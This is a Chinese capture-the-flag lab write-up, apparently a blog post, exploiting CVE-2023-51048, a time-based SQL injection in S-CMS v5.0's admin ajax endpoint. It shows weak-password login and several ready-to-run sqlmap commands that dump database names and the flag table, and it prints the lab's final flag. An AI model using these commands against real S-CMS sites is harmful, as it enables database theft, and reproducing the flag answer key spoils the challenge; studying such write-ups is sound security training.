【春秋云镜】CVE-2023-51048 SCMS v5.0 SQL注入漏洞

题目解析

根据题目漏洞说明,S-CMS v5.0 被发现存在SQLI。上网查询相关文章,发现该漏洞描述如下:

S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php.于是直接访问/admin登录。 

系统后台登录

启动环境以后,点击访问/admin,需要登录,可以尝试弱口令,发现是admin/admin23。

 点击账号管理,添加管理员抓包。

抓包发现如下参数。

 sqlmap注入一把梭

发现A_newsauth等四个参数均存在sql注入,这里只跑一个 A_newsauth,存在时间注入

python sqlmap.py -r cve-2023-51048.txt -p A_newsauth%5B%5D –randomize=A_login  --dbs --batch

 查找哪里有flag

python sqlmap.py -r cve-2023-51048.txt -p A_newsauth%5B%5D –randomize=A_login --dbms mysql --sql-query "SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM  information_schema.COLUMNS   WHERE COLUMN_NAME = 'flag' limit 2,1"

读取flag内容即可。

python sqlmap.py -r cve-2023-51048.txt -p A_newsauth%5B%5D –randomize=A_login --dbms mysql --sql-query "SELECT flag from scms.fllllaaaag"

发现有一位是大写,注错一位,不得不说,受网络问题影响,注入过程是真的费时间还会出现问题。期间注意环境延时,好在可以延时两次,足够跑出来flag了。又重新把注入错误的注入了一次。

python sqlmap.py -r cve-2023-51048.txt -p A_newsauth%5B%5D –randomize=A_login --dbms mysql --sql-query "SELECT substring(flag,17,1) from scms.fllllaaaag"

 当然你也可以自己去试,也能试出来是2。

 flag最终值

flag{572cef57-6426-4602-ade7-4d2f5b995730}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值